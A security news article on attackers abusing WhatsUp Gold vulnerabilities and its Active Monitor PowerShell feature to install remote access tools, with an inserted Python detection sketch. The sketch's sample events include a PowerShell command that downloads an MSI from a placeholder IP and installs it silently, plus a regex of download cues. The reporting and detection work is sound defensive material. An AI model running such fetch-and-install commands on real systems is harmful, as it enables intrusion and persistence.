Cyberattacks Target WhatsUp Gold Exploiting New PoC Vulnerabilities

Malicious actors have been quick to exploit publicly available proof-of-concept (PoC) exploits for newly disclosed vulnerabilities in Progress Software's WhatsUp Gold. The attacks, which began on August 30, 2024, are targeting organizations that have yet to apply the necessary patches.

The initial wave of attacks kicked off just five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8). This vulnerability was discovered by security researcher Sina Kheirkhah of the Summoning Team, who is also credited with identifying and reporting CVE-2024-6671 (also CVSS score: 9.8).

Both vulnerabilities allow unauthenticated attackers to retrieve a user’s encrypted password, and Progress Software patched these critical issues in mid-August 2024.

However, according to Trend Micro researchers Hitomi Kimura and Maria Emreen Viray, organizations that were slow to apply these patches have become targets of opportunistic attacks. “The timeline of events suggests that despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the PoC’s publication,” they said in a recent analysis.

The attacks appear to bypass WhatsUp Gold authentication and then abuse the product's Active Monitor PowerShell Script feature to run attacker-supplied commands. Through it, the actors download and install various remote access tools, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, all of which help maintain persistence on compromised Windows hosts.

The attackers use an MSI installer file retrieved from a remote server to install Atera Agent and Splashtop Remote, among other tools.

Trend Micro researchers explained, "The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function. The threat actors in this case chose it to perform remote arbitrary code execution."

Although no further malicious activities have been observed yet, the use of several remote access tools hints at the involvement of ransomware groups.
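The process lineage described above (NmPoller.exe launching PowerShell that fetches an MSI and installs a remote access tool) is what a defender can hunt for. The following detection sketch is an added example, not code from the original article or from Trend Micro; the events are constructed Sysmon-style process-creation records, the 203.0.113.10 address is a documentation placeholder, and the install path for NmPoller.exe is assumed.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"iwr http://203.0.113.10/agent.msi "
                     "-OutFile C:\\Users\\Public\\a.msi; msiexec /i C:\\Users\\Public\\a.msi /qn\""},
    {"parent_image": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\WhatsUp\\Scripts\\check-disk.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /i C:\\Downloads\\7zip.msi"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line cues that a monitor script is fetching a payload or running an installer.
SUSPICIOUS_CMD = re.compile(
    r"(https?://|invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bmsiexec\b|start-bitstransfer)",
    re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, so rules do not depend on install location."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, reason) for one event, or None if it is not of interest."""
    parent, child = basename(event["parent_image"]), basename(event["image"])
    if parent != "nmpoller.exe" or child not in SCRIPT_HOSTS:
        return None
    if SUSPICIOUS_CMD.search(event["command_line"]):
        return ("high", f"NmPoller.exe -> {child} with download/installer cues in command line")
    # Lineage alone is expected: Active Monitor scripts legitimately run under NmPoller.exe.
    # Record it for review against the monitors an administrator actually configured.
    return ("low", f"NmPoller.exe -> {child} (review against configured Active Monitors)")


def scan(events):
    """Run classify() over a list of events; returns (index, severity, reason) tuples."""
    return [(i, *verdict) for i, e in enumerate(events) if (verdict := classify(e))]


if __name__ == "__main__":
    for idx, severity, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {severity}: {reason}")
```

Because the script host is a legitimate WhatsUp Gold function, the low-severity lineage match is only useful once the set of configured Active Monitor scripts has been baselined; the high-severity match is the one worth alerting on directly.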

This marks the second time that WhatsUp Gold vulnerabilities have been actively exploited in the wild. Just last month, the Shadowserver Foundation observed attempts to exploit CVE-2024-4885 (CVSS score: 9.8), another critical flaw patched by Progress in June 2024.

This latest round of attacks follows the recent disclosure by Trend Micro that cybercriminals have been exploiting a now-patched security flaw in Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0). This vulnerability is being abused to deliver the Godzilla web shell, a major security risk for organizations worldwide.

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067